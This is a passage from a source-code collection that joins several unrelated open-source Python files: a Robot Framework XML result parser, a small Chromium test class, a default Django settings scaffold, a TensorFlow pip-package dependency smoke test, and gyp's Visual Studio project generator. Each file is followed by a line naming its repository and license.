raise DataError("Incompatible XML element '%s'" % elem.tag)
return handler.start(elem, result), handler
def start(self, elem, result):
return result
def end(self, elem, result):
pass
def _timestamp(self, elem, attr_name):
timestamp = elem.get(attr_name)
return timestamp if timestamp != 'N/A' else None
class RootHandler(_Handler):
def _children(self):
return [RobotHandler()]
class RobotHandler(_Handler):
tag = 'robot'
def start(self, elem, result):
generator = elem.get('generator', 'unknown').split()[0].upper()
result.generated_by_robot = generator == 'ROBOT'
return result
def _children(self):
return [RootSuiteHandler(), StatisticsHandler(), ErrorsHandler()]
class SuiteHandler(_Handler):
tag = 'suite'
def start(self, elem, result):
return result.suites.create(name=elem.get('name'),
source=elem.get('source', ''))
def _children(self):
return [DocHandler(), MetadataHandler(), SuiteStatusHandler(),
KeywordHandler(), TestCaseHandler(), self]
class RootSuiteHandler(SuiteHandler):
def start(self, elem, result):
result.suite.name = elem.get('name')
result.suite.source = elem.get('source')
return result.suite
def _children(self):
return SuiteHandler._children(self)[:-1] + [SuiteHandler()]
class TestCaseHandler(_Handler):
tag = 'test'
def start(self, elem, result):
return result.tests.create(name=elem.get('name'),
timeout=elem.get('timeout'))
def _children(self):
return [DocHandler(), TagsHandler(), TestStatusHandler(), KeywordHandler()]
class KeywordHandler(_Handler):
tag = 'kw'
def start(self, elem, result):
return result.keywords.create(name=elem.get('name'),
timeout=elem.get('timeout'),
type=elem.get('type'))
def _children(self):
return [DocHandler(), ArgumentsHandler(), KeywordStatusHandler(),
MessageHandler(), self]
class MessageHandler(_Handler):
tag = 'msg'
def end(self, elem, result):
result.messages.create(elem.text or '',
elem.get('level'),
elem.get('html', 'no') == 'yes',
self._timestamp(elem, 'timestamp'))
class _StatusHandler(_Handler):
tag = 'status'
def _set_status(self, elem, result):
result.status = elem.get('status', 'FAIL')
def _set_message(self, elem, result):
result.message = elem.text or ''
def _set_times(self, elem, result):
result.starttime = self._timestamp(elem, 'starttime')
result.endtime = self._timestamp(elem, 'endtime')
class KeywordStatusHandler(_StatusHandler):
def end(self, elem, result):
self._set_status(elem, result)
self._set_times(elem, result)
if result.type == result.TEARDOWN_TYPE:
self._set_message(elem, result)
class SuiteStatusHandler(_StatusHandler):
def end(self, elem, result):
self._set_message(elem, result)
self._set_times(elem, result)
class TestStatusHandler(_StatusHandler):
def end(self, elem, result):
self._set_status(elem, result)
self._set_message(elem, result)
self._set_times(elem, result)
class DocHandler(_Handler):
tag = 'doc'
def end(self, elem, result):
result.doc = elem.text or ''
class MetadataHandler(_Handler):
tag = 'metadata'
def _children(self):
return [MetadataItemHandler()]
class MetadataItemHandler(_Handler):
tag = 'item'
def end(self, elem, result):
result.metadata[elem.get('name')] = elem.text or ''
class TagsHandler(_Handler):
tag = 'tags'
def _children(self):
return [TagHandler()]
class TagHandler(_Handler):
tag = 'tag'
def end(self, elem, result):
result.tags.add(elem.text or '')
class ArgumentsHandler(_Handler):
tag = 'arguments'
def _children(self):
return [ArgumentHandler()]
class ArgumentHandler(_Handler):
tag = 'arg'
def end(self, elem, result):
result.args += (elem.text or '',)
class ErrorsHandler(_Handler):
tag = 'errors'
def start(self, elem, result):
return result.errors
def _children(self):
return [MessageHandler()]
class StatisticsHandler(_Handler):
tag = 'statistics'
def handle_child(self, elem, result):
return result, self
| ktan2020/legacy-automation | win/Lib/site-packages/robot/result/xmlelementhandlers.py | Python | mit | 6,002 |
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import print_function
class Cat(object):
def Run(self):
print('Meow')
| catapult-project/catapult | telemetry/telemetry/internal/testing/dependency_test_dir/other_animals/cat/cat/cat_object.py | Python | bsd-3-clause | 255 |
"""
Django settings for todolist project.
Generated by 'django-admin startproject' using Django 1.8.6.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = ')g#%y07d!0k$=vv)npcgmhgeqk4io4j$36jr8)4gq1(lpsmut4'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'todolist.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'todolist.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
| tingbaozhao/pythonWeb | todolist/todolist/settings.py | Python | agpl-3.0 | 2,644 |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""This pip smoke test verifies dependency files exist in the pip package.
This script runs bazel queries to see what python files are required by the
tests and ensures they are in the pip package superset.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import subprocess
os.chdir(os.path.abspath(os.path.join(os.path.dirname(__file__), "../../..")))
PIP_PACKAGE_QUERY_EXPRESSION = (
"deps(//tensorflow/tools/pip_package:build_pip_package)")
# List of file paths containing BUILD files that should not be included for the
# pip smoke test.
BUILD_DENYLIST = [
"tensorflow/lite",
"tensorflow/compiler/mlir/lite",
"tensorflow/python/kernel_tests/signal",
"tensorflow/examples",
"tensorflow/tools/android",
"tensorflow/python/eager/benchmarks",
]
def GetBuild(dir_base):
"""Get the list of BUILD file all targets recursively startind at dir_base."""
items = []
for root, _, files in os.walk(dir_base):
for name in files:
if (name == "BUILD" and not any(x in root for x in BUILD_DENYLIST)):
items.append("//" + root + ":all")
return items
def BuildPyTestDependencies():
python_targets = GetBuild("tensorflow/python")
tensorflow_targets = GetBuild("tensorflow")
# Build list of test targets,
  # python - attr(manual|no_pip)
targets = " + ".join(python_targets)
targets += ' - attr(tags, "manual|no_pip", %s)' % " + ".join(
tensorflow_targets)
query_kind = "kind(py_test, %s)" % targets
# Skip benchmarks etc.
query_filter = 'filter("^((?!benchmark).)*$", %s)' % query_kind
# Get the dependencies
query_deps = "deps(%s, 1)" % query_filter
return python_targets, query_deps
PYTHON_TARGETS, PY_TEST_QUERY_EXPRESSION = BuildPyTestDependencies()
# TODO(amitpatankar): Clean up denylist.
# List of dependencies that should not included in the pip package.
DEPENDENCY_DENYLIST = [
"//tensorflow/cc/saved_model:saved_model_test_files",
"//tensorflow/cc/saved_model:saved_model_half_plus_two",
"//tensorflow:no_tensorflow_py_deps",
"//tensorflow/tools/pip_package:win_pip_package_marker",
"//tensorflow/core:image_testdata",
"//tensorflow/core/lib/lmdb:lmdb_testdata",
"//tensorflow/core/lib/lmdb/testdata:lmdb_testdata",
"//tensorflow/core/kernels/cloud:bigquery_reader_ops",
"//tensorflow/python:extra_py_tests_deps",
"//tensorflow/python:mixed_precision",
"//tensorflow/python:tf_optimizer",
"//tensorflow/python:compare_test_proto_py",
"//tensorflow/python/framework:test_ops_2",
"//tensorflow/python/framework:test_file_system.so",
"//tensorflow/python/debug:grpc_tensorflow_server.par",
"//tensorflow/python/feature_column:vocabulary_testdata",
"//tensorflow/python/util:nest_test_main_lib",
# lite
"//tensorflow/lite/experimental/examples/lstm:rnn_cell",
"//tensorflow/lite/experimental/examples/lstm:rnn_cell.py",
"//tensorflow/lite/experimental/examples/lstm:unidirectional_sequence_lstm_test", # pylint:disable=line-too-long
"//tensorflow/lite/experimental/examples/lstm:unidirectional_sequence_lstm_test.py", # pylint:disable=line-too-long
"//tensorflow/lite/python:interpreter",
"//tensorflow/lite/python:interpreter_test",
"//tensorflow/lite/python:interpreter.py",
"//tensorflow/lite/python:interpreter_test.py",
]
def main():
"""This script runs the pip smoke test.
Raises:
    RuntimeError: If any py_test dependency is missing from the pip package
      superset.
Prerequisites:
1. Bazel is installed.
2. Running in github repo of tensorflow.
3. Configure has been run.
"""
# pip_package_dependencies_list is the list of included files in pip packages
pip_package_dependencies = subprocess.check_output(
["bazel", "cquery", PIP_PACKAGE_QUERY_EXPRESSION])
if isinstance(pip_package_dependencies, bytes):
pip_package_dependencies = pip_package_dependencies.decode("utf-8")
pip_package_dependencies_list = pip_package_dependencies.strip().split("\n")
pip_package_dependencies_list = [
x.split()[0] for x in pip_package_dependencies_list
]
print("Pip package superset size: %d" % len(pip_package_dependencies_list))
# tf_py_test_dependencies is the list of dependencies for all python
# tests in tensorflow
tf_py_test_dependencies = subprocess.check_output(
["bazel", "cquery", PY_TEST_QUERY_EXPRESSION])
if isinstance(tf_py_test_dependencies, bytes):
tf_py_test_dependencies = tf_py_test_dependencies.decode("utf-8")
tf_py_test_dependencies_list = tf_py_test_dependencies.strip().split("\n")
tf_py_test_dependencies_list = [
      x.split()[0] for x in tf_py_test_dependencies_list
]
print("Pytest dependency subset size: %d" % len(tf_py_test_dependencies_list))
missing_dependencies = []
# File extensions and endings to ignore
ignore_extensions = [
"_test", "_test.py", "_test_gpu", "_test_gpu.py", "_test_lib"
]
ignored_files_count = 0
denylisted_dependencies_count = len(DEPENDENCY_DENYLIST)
# Compare dependencies
for dependency in tf_py_test_dependencies_list:
if dependency and dependency.startswith("//tensorflow"):
ignore = False
# Ignore extensions
if any(dependency.endswith(ext) for ext in ignore_extensions):
ignore = True
ignored_files_count += 1
# Check if the dependency is in the pip package, the dependency denylist,
# or should be ignored because of its file extension.
if not (ignore or dependency in pip_package_dependencies_list or
dependency in DEPENDENCY_DENYLIST):
missing_dependencies.append(dependency)
print("Ignored files count: %d" % ignored_files_count)
print("Denylisted dependencies count: %d" % denylisted_dependencies_count)
if missing_dependencies:
print("Missing the following dependencies from pip_packages:")
for missing_dependency in missing_dependencies:
print("\nMissing dependency: %s " % missing_dependency)
print("Affected Tests:")
rdep_query = ("rdeps(kind(py_test, %s), %s)" %
(" + ".join(PYTHON_TARGETS), missing_dependency))
      affected_tests = subprocess.check_output(["bazel", "cquery", rdep_query])
      if isinstance(affected_tests, bytes):
        affected_tests = affected_tests.decode("utf-8")
      affected_tests_list = affected_tests.split("\n")[:-2]
print("\n".join(affected_tests_list))
raise RuntimeError("""
One or more added test dependencies are not in the pip package.
If these test dependencies need to be in TensorFlow pip package, please add them to //tensorflow/tools/pip_package/BUILD.
Else add no_pip tag to the test.""")
else:
print("TEST PASSED")
if __name__ == "__main__":
main()
| sarvex/tensorflow | tensorflow/tools/pip_package/pip_smoke_test.py | Python | apache-2.0 | 7,387 |
#!/usr/bin/python
# Copyright (c) 2011 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import copy
import ntpath
import os
import posixpath
import re
import subprocess
import sys
import gyp.common
import gyp.easy_xml as easy_xml
import gyp.MSVSNew as MSVSNew
import gyp.MSVSProject as MSVSProject
import gyp.MSVSSettings as MSVSSettings
import gyp.MSVSToolFile as MSVSToolFile
import gyp.MSVSUserFile as MSVSUserFile
import gyp.MSVSVersion as MSVSVersion
# Regular expression for validating Visual Studio GUIDs. If the GUID
# contains lowercase hex letters, MSVS will be fine. However,
# IncrediBuild BuildConsole will parse the solution file, but then
# silently skip building the target causing hard to track down errors.
# Note that this only happens with the BuildConsole, and does not occur
# if IncrediBuild is executed from inside Visual Studio. This regex
# validates that the string looks like a GUID with all uppercase hex
# letters.
VALID_MSVS_GUID_CHARS = re.compile('^[A-F0-9\-]+$')
generator_default_variables = {
'EXECUTABLE_PREFIX': '',
'EXECUTABLE_SUFFIX': '.exe',
'STATIC_LIB_PREFIX': '',
'SHARED_LIB_PREFIX': '',
'STATIC_LIB_SUFFIX': '.lib',
'SHARED_LIB_SUFFIX': '.dll',
'INTERMEDIATE_DIR': '$(IntDir)',
'SHARED_INTERMEDIATE_DIR': '$(OutDir)/obj/global_intermediate',
'OS': 'win',
'PRODUCT_DIR': '$(OutDir)',
# TODO(jeanluc) The way we currently generate libraries makes Visual
# Studio 2010 unhappy. We get a lot of warnings like:
# warning MSB8012: TargetPath(...\Debug\gles2_c_lib.lib) does not match
# the Library's OutputFile property value (...\Debug\lib\gles2_c_lib.lib).
# This may cause your project to build incorrectly. To correct this,
# please make sure that $(OutDir), $(TargetName) and $(TargetExt) property
# values match the value specified in %(Lib.OutputFile).
# Despite the warnings, this compile correctly. It would be nice to get rid
# of the warnings.
# TODO(jeanluc) I had: 'LIB_DIR': '$(OutDir)lib',
'LIB_DIR': '$(OutDir)/lib',
'RULE_INPUT_ROOT': '$(InputName)',
'RULE_INPUT_DIRNAME': '$(InputDir)',
'RULE_INPUT_EXT': '$(InputExt)',
'RULE_INPUT_NAME': '$(InputFileName)',
'RULE_INPUT_PATH': '$(InputPath)',
'CONFIGURATION_NAME': '$(ConfigurationName)',
}
# The msvs specific sections that hold paths
generator_additional_path_sections = [
'msvs_cygwin_dirs',
'msvs_props',
]
generator_additional_non_configuration_keys = [
'msvs_cygwin_dirs',
'msvs_cygwin_shell',
'msvs_shard',
'msvs_strip_hierarchy',
]
# List of precompiled header related keys.
precomp_keys = [
'msvs_precompiled_header',
'msvs_precompiled_source',
]
cached_username = None
cached_domain = None
# TODO(gspencer): Switch the os.environ calls to be
# win32api.GetDomainName() and win32api.GetUserName() once the
# python version in depot_tools has been updated to work on Vista
# 64-bit.
def _GetDomainAndUserName():
if sys.platform not in ('win32', 'cygwin'):
return ('DOMAIN', 'USERNAME')
global cached_username
global cached_domain
if not cached_domain or not cached_username:
domain = os.environ.get('USERDOMAIN')
username = os.environ.get('USERNAME')
if not domain or not username:
call = subprocess.Popen(['net', 'config', 'Workstation'],
stdout=subprocess.PIPE)
config = call.communicate()[0]
username_re = re.compile('^User name\s+(\S+)', re.MULTILINE)
username_match = username_re.search(config)
if username_match:
username = username_match.group(1)
domain_re = re.compile('^Logon domain\s+(\S+)', re.MULTILINE)
domain_match = domain_re.search(config)
if domain_match:
domain = domain_match.group(1)
cached_domain = domain
cached_username = username
return (cached_domain, cached_username)
fixpath_prefix = None
def _NormalizedSource(source):
"""Normalize the path.
But not if that gets rid of a variable, as this may expand to something
larger than one directory.
Arguments:
    source: The path to be normalized.
Returns:
The normalized path.
"""
normalized = os.path.normpath(source)
if source.count('$') == normalized.count('$'):
source = normalized
return source
def _FixPath(path):
"""Convert paths to a form that will make sense in a vcproj file.
Arguments:
path: The path to convert, may contain / etc.
Returns:
The path with all slashes made into backslashes.
"""
if fixpath_prefix and path and not os.path.isabs(path) and not path[0] == '$':
path = os.path.join(fixpath_prefix, path)
path = path.replace('/', '\\')
path = _NormalizedSource(path)
if path and path[-1] == '\\':
path = path[:-1]
return path
def _FixPaths(paths):
"""Fix each of the paths of the list."""
return [_FixPath(i) for i in paths]
def _DoConvertSourcesToFilterRecurse(result, sources, prefix, excluded,
layers_to_strip):
if layers_to_strip < 0:
layers_to_strip = 0
excluded_result = []
folders = dict()
# Gather files into the final result, excluded, or folders.
for s in sources:
if len(s) == 1:
filename = _NormalizedSource('\\'.join(prefix + s))
if filename in excluded:
excluded_result.append(filename)
else:
result.append(filename)
else:
if not folders.get(s[0]):
folders[s[0]] = []
folders[s[0]].append(s[1:])
# Add a folder for excluded files.
if excluded_result:
excluded_folder = MSVSProject.Filter('_excluded_files',
contents=excluded_result)
result.append(excluded_folder)
# Populate all the folders.
for f in folders:
contents = []
_DoConvertSourcesToFilterRecurse(contents, folders[f],
prefix=prefix + [f],
excluded=excluded,
layers_to_strip=layers_to_strip-1)
if layers_to_strip == 0:
contents = MSVSProject.Filter(f, contents=contents)
result.append(contents)
else:
result += contents
#print "layers_to_strip %d result: %s" % (layers_to_strip, result)
def _ConvertSourcesToFilterHierarchy(sources, prefix=None, excluded=None,
layers_to_strip = 0):
"""Converts a list split source file paths into a vcproj folder hierarchy.
Arguments:
sources: A list of source file paths split.
prefix: A list of source file path layers meant to apply to each of sources.
    excluded: A set of excluded files.
    layers_to_strip: Number of leading folder levels to flatten into their
      parent instead of creating nested filters for them.
Returns:
A hierarchy of filenames and MSVSProject.Filter objects that matches the
layout of the source tree.
For example:
_ConvertSourcesToFilterHierarchy([['a', 'bob1.c'], ['b', 'bob2.c']],
prefix=['joe'])
-->
[MSVSProject.Filter('a', contents=['joe\\a\\bob1.c']),
MSVSProject.Filter('b', contents=['joe\\b\\bob2.c'])]
"""
if not prefix: prefix = []
result = []
_DoConvertSourcesToFilterRecurse(result, sources, prefix, excluded,
layers_to_strip)
return result
# print "_ConvertSourcesToFilterHierarchy: sources=%s, prefix=%s, excluded=%s" % (sources, prefix, excluded)
def _ToolAppend(tools, tool_name, setting, value, only_if_unset=False):
if not value: return
# TODO(bradnelson): ugly hack, fix this more generally!!!
if 'Directories' in setting or 'Dependencies' in setting:
if type(value) == str:
value = value.replace('/', '\\')
else:
value = [i.replace('/', '\\') for i in value]
if not tools.get(tool_name):
tools[tool_name] = dict()
tool = tools[tool_name]
if tool.get(setting):
if only_if_unset: return
if type(tool[setting]) == list:
tool[setting] += value
else:
raise TypeError(
'Appending "%s" to a non-list setting "%s" for tool "%s" is '
'not allowed, previous value: %s' % (
value, setting, tool_name, str(tool[setting])))
else:
tool[setting] = value
def _ConfigPlatform(config_data):
return config_data.get('msvs_configuration_platform', 'Win32')
def _ConfigBaseName(config_name, platform_name):
if config_name.endswith('_' + platform_name):
return config_name[0:-len(platform_name)-1]
else:
return config_name
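# For example (illustrative): a config named 'Debug_x64' whose data sets
# 'msvs_configuration_platform' to 'x64' yields 'Debug|x64'.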
def _ConfigFullName(config_name, config_data):
platform_name = _ConfigPlatform(config_data)
return '%s|%s' % (_ConfigBaseName(config_name, platform_name), platform_name)
def _BuildCommandLineForRuleRaw(spec, cmd, cygwin_shell, fix_paths,
has_input_path, quote_cmd):
if [x for x in cmd if '$(InputDir)' in x]:
input_dir_preamble = (
'set INPUTDIR=$(InputDir)\n'
'set INPUTDIR=%INPUTDIR:$(ProjectDir)=%\n'
'set INPUTDIR=%INPUTDIR:~0,-1%\n'
)
else:
input_dir_preamble = ''
if cygwin_shell:
# Find path to cygwin.
cygwin_dir = _FixPath(spec.get('msvs_cygwin_dirs', ['.'])[0])
# Prepare command.
direct_cmd = cmd
direct_cmd = [i.replace('$(IntDir)',
'`cygpath -m "${INTDIR}"`') for i in direct_cmd]
direct_cmd = [i.replace('$(OutDir)',
'`cygpath -m "${OUTDIR}"`') for i in direct_cmd]
direct_cmd = [i.replace('$(InputDir)',
'`cygpath -m "${INPUTDIR}"`') for i in direct_cmd]
if has_input_path:
direct_cmd = [i.replace('$(InputPath)',
'`cygpath -m "${INPUTPATH}"`')
for i in direct_cmd]
direct_cmd = ['"%s"' % i for i in direct_cmd]
direct_cmd = [i.replace('"', '\\"') for i in direct_cmd]
#direct_cmd = gyp.common.EncodePOSIXShellList(direct_cmd)
direct_cmd = ' '.join(direct_cmd)
# TODO(quote): regularize quoting path names throughout the module
cmd = (
'call "$(ProjectDir)%(cygwin_dir)s\\setup_env.bat" && '
'set CYGWIN=nontsec&& ')
if direct_cmd.find('NUMBER_OF_PROCESSORS') >= 0:
cmd += 'set /a NUMBER_OF_PROCESSORS_PLUS_1=%%NUMBER_OF_PROCESSORS%%+1&& '
if direct_cmd.find('INTDIR') >= 0:
cmd += 'set INTDIR=$(IntDir)&& '
if direct_cmd.find('OUTDIR') >= 0:
cmd += 'set OUTDIR=$(OutDir)&& '
if has_input_path and direct_cmd.find('INPUTPATH') >= 0:
cmd += 'set INPUTPATH=$(InputPath) && '
cmd += 'bash -c "%(cmd)s"'
cmd = cmd % {'cygwin_dir': cygwin_dir,
'cmd': direct_cmd}
return input_dir_preamble + cmd
else:
#print "_BuildCommandLineForRuleRaw: cmd %s" % cmd
# Convert cat --> type to mimic unix.
# if cmd[0] == 'cat':
# command = ['type']
# else:
# if fix_paths:
# command = [cmd[0].replace('/', '\\')]
# else:
# command = [cmd[0]]
# Fix the paths
new_cmd = []
for c in cmd:
words = []
for w in c.split(' '):
# If the argument starts with a slash, it's probably a command
# line switch, otherwise fix the path
if not w.startswith('/'):
w = _FixPath(w)
w.replace('$(InputDir)','%INPUTDIR%')
words.append(w)
c = ' '.join(words)
new_cmd.append(c)
command = [new_cmd[0]]
arguments = new_cmd[1:]
if quote_cmd:
# Support a mode for using cmd directly.
# Convert any paths to native form (first element is used directly).
# TODO(quote): regularize quoting path names throughout the module
arguments = ['"%s"' % i for i in arguments]
# Collapse into a single command.
return input_dir_preamble + ' '.join(command + arguments)
def _BuildCommandLineForRule(spec, rule, has_input_path):
# Find path to cygwin.
cygwin_dir = _FixPath(spec.get('msvs_cygwin_dirs', ['.'])[0])
# Currently this weird argument munging is used to duplicate the way a
# python script would need to be run as part of the chrome tree.
# Eventually we should add some sort of rule_default option to set this
# per project. For now the behavior chrome needs is the default.
mcs = rule.get('msvs_cygwin_shell')
if mcs is None:
mcs = int(spec.get('msvs_cygwin_shell', 1))
elif isinstance(mcs, str):
mcs = int(mcs)
fix_paths = int(rule.get('msvs_fix_action_paths', 1))
quote_cmd = int(rule.get('msvs_quote_cmd', 1))
return _BuildCommandLineForRuleRaw(spec, rule['action'], mcs, fix_paths,
has_input_path, quote_cmd)
def _AddActionStep(actions_dict, inputs, outputs, description, command, config):
"""Merge action into an existing list of actions.
Care must be taken so that actions which have overlapping inputs either don't
get assigned to the same input, or get collapsed into one.
Arguments:
actions_dict: dictionary keyed on input name, which maps to a list of
dicts describing the actions attached to that input file.
inputs: list of inputs
outputs: list of outputs
description: description of the action
    command: command line to execute
    config: configuration to attach the action to
"""
# Require there to be at least one input (call sites will ensure this).
assert inputs
action = {
'inputs': inputs,
'outputs': outputs,
'description': description,
'command': command,
}
# Pick where to stick this action.
# While less than optimal in terms of build time, attach them to the first
# input for now.
chosen_input = inputs[0]
# Add it there.
config_actions_dict = actions_dict[config]
if chosen_input not in config_actions_dict:
config_actions_dict[chosen_input] = []
config_actions_dict[chosen_input].append(action)
def _AddCustomBuildToolForMSVS(p, spec, primary_input,
inputs, outputs, description, cmd, config):
"""Add a custom build tool to execute something.
Arguments:
p: the target project
spec: the target project dict
primary_input: input file to attach the build tool to
inputs: list of inputs
outputs: list of outputs
description: description of the action
cmd: command line to execute
config: configuration to add it to
"""
inputs = _FixPaths(inputs)
outputs = _FixPaths(outputs)
#print "Adding custom cmd: %s" % cmd
tool = MSVSProject.Tool(
'VCCustomBuildTool',
{'Description': description,
'AdditionalDependencies': ';'.join(inputs),
'Outputs': ';'.join(outputs),
'CommandLine': cmd
})
# Add to the properties of primary input for each config.
c_data = spec['configurations'][config]
p.AddFileConfig(_FixPath(primary_input),
_ConfigFullName(config, c_data), tools=[tool])
def _AddAccumulatedActionsToMSVS(p, spec, actions_dict):
"""Add actions accumulated into an actions_dict, merging as needed.
Arguments:
p: the target project
spec: the target project dict
actions_dict: dictionary keyed on input name, which maps to a list of
dicts describing the actions attached to that input file.
"""
for config in actions_dict:
#print "_AddAccumulatedActionsToMSVS: config %s" % config
config_actions_dict = actions_dict[config]
for primary_input in config_actions_dict:
inputs = set()
outputs = set()
descriptions = []
commands = []
for action in config_actions_dict[primary_input]:
inputs.update(set(action['inputs']))
outputs.update(set(action['outputs']))
descriptions.append(action['description'])
commands.append(action['command'])
# Add the custom build step for one input file.
description = ', and also '.join(descriptions)
command = '\r\n'.join(commands)
_AddCustomBuildToolForMSVS(p, spec,
primary_input=primary_input,
inputs=inputs,
outputs=outputs,
description=description,
cmd=command,
config=config)
def _RuleExpandPath(path, input_file):
"""Given the input file to which a rule applied, string substitute a path.
Arguments:
path: a path to string expand
input_file: the file to which the rule applied.
Returns:
The string substituted path.
"""
path = path.replace('$(InputName)',
os.path.splitext(os.path.split(input_file)[1])[0])
path = path.replace('$(InputDir)', os.path.dirname(input_file))
path = path.replace('$(InputExt)',
os.path.splitext(os.path.split(input_file)[1])[1])
path = path.replace('$(InputFileName)', os.path.split(input_file)[1])
path = path.replace('$(InputPath)', input_file)
return path
def _FindRuleTriggerFiles(rule, sources):
"""Find the list of files which a particular rule applies to.
Arguments:
rule: the rule in question
sources: the set of all known source files for this project
Returns:
The list of sources that trigger a particular rule.
"""
rule_ext = rule['extension']
return [s for s in sources if s.endswith('.' + rule_ext)]
def _RuleInputsAndOutputs(rule, trigger_file):
"""Find the inputs and outputs generated by a rule.
Arguments:
rule: the rule in question.
trigger_file: the main trigger for this rule.
Returns:
The pair of (inputs, outputs) involved in this rule.
"""
raw_inputs = _FixPaths(rule.get('inputs', []))
raw_outputs = _FixPaths(rule.get('outputs', []))
inputs = set()
outputs = set()
inputs.add(trigger_file)
for i in raw_inputs:
inputs.add(_RuleExpandPath(i, trigger_file))
for o in raw_outputs:
outputs.add(_RuleExpandPath(o, trigger_file))
return (inputs, outputs)
def _GenerateNativeRulesForMSVS(p, rules, output_dir, spec, options):
"""Generate a native rules file.
Arguments:
p: the target project
rules: the set of rules to include
output_dir: the directory in which the project/gyp resides
spec: the project dict
options: global generator options
"""
rules_filename = '%s%s.rules' % (spec['target_name'],
options.suffix)
rules_file = MSVSToolFile.Writer(os.path.join(output_dir, rules_filename),
spec['target_name'])
# Add each rule.
for r in rules:
rule_name = r['rule_name']
rule_ext = r['extension']
inputs = _FixPaths(r.get('inputs', []))
outputs = _FixPaths(r.get('outputs', []))
cmd = _BuildCommandLineForRule(spec, r, has_input_path=True)
rules_file.AddCustomBuildRule(name=rule_name,
description=r.get('message', rule_name),
extensions=[rule_ext],
additional_dependencies=inputs,
outputs=outputs,
cmd=cmd)
# Write out rules file.
rules_file.WriteIfChanged()
# Add rules file to project.
p.AddToolFile(rules_filename)
def _Cygwinify(path):
path = path.replace('$(OutDir)', '$(OutDirCygwin)')
path = path.replace('$(IntDir)', '$(IntDirCygwin)')
return path
def _GenerateExternalRules(rules, output_dir, spec,
sources, options, actions_to_add):
"""Generate an external makefile to do a set of rules.
Arguments:
rules: the list of rules to include
output_dir: path containing project and gyp files
spec: project specification data
sources: set of sources known
options: global generator options
actions_to_add: The list of actions we will add to.
"""
filename = '%s_rules%s.mk' % (spec['target_name'], options.suffix)
mk_file = gyp.common.WriteOnDiff(os.path.join(output_dir, filename))
# Find cygwin style versions of some paths.
mk_file.write('OutDirCygwin:=$(shell cygpath -u "$(OutDir)")\n')
mk_file.write('IntDirCygwin:=$(shell cygpath -u "$(IntDir)")\n')
# Gather stuff needed to emit all: target.
all_inputs = set()
all_outputs = set()
all_output_dirs = set()
first_outputs = []
for rule in rules:
trigger_files = _FindRuleTriggerFiles(rule, sources)
for tf in trigger_files:
inputs, outputs = _RuleInputsAndOutputs(rule, tf)
all_inputs.update(set(inputs))
all_outputs.update(set(outputs))
# Only use one target from each rule as the dependency for
# 'all' so we don't try to build each rule multiple times.
first_outputs.append(list(outputs)[0])
# Get the unique output directories for this rule.
output_dirs = [os.path.split(i)[0] for i in outputs]
for od in output_dirs:
all_output_dirs.add(od)
first_outputs_cyg = [_Cygwinify(i) for i in first_outputs]
# Write out all: target, including mkdir for each output directory.
mk_file.write('all: %s\n' % ' '.join(first_outputs_cyg))
for od in all_output_dirs:
if od:
mk_file.write('\tmkdir -p `cygpath -u "%s"`\n' % od)
mk_file.write('\n')
# Define how each output is generated.
for rule in rules:
trigger_files = _FindRuleTriggerFiles(rule, sources)
for tf in trigger_files:
# Get all the inputs and outputs for this rule for this trigger file.
inputs, outputs = _RuleInputsAndOutputs(rule, tf)
inputs = [_Cygwinify(i) for i in inputs]
outputs = [_Cygwinify(i) for i in outputs]
# Prepare the command line for this rule.
cmd = [_RuleExpandPath(c, tf) for c in rule['action']]
cmd = ['"%s"' % i for i in cmd]
cmd = ' '.join(cmd)
# Add it to the makefile.
mk_file.write('%s: %s\n' % (' '.join(outputs), ' '.join(inputs)))
mk_file.write('\t%s\n\n' % cmd)
# Close up the file.
mk_file.close()
# Add makefile to list of sources.
sources.add(filename)
# Add a build action to call makefile.
cmd = ['make',
'OutDir=$(OutDir)',
'IntDir=$(IntDir)',
'-j', '${NUMBER_OF_PROCESSORS_PLUS_1}',
'-f', filename]
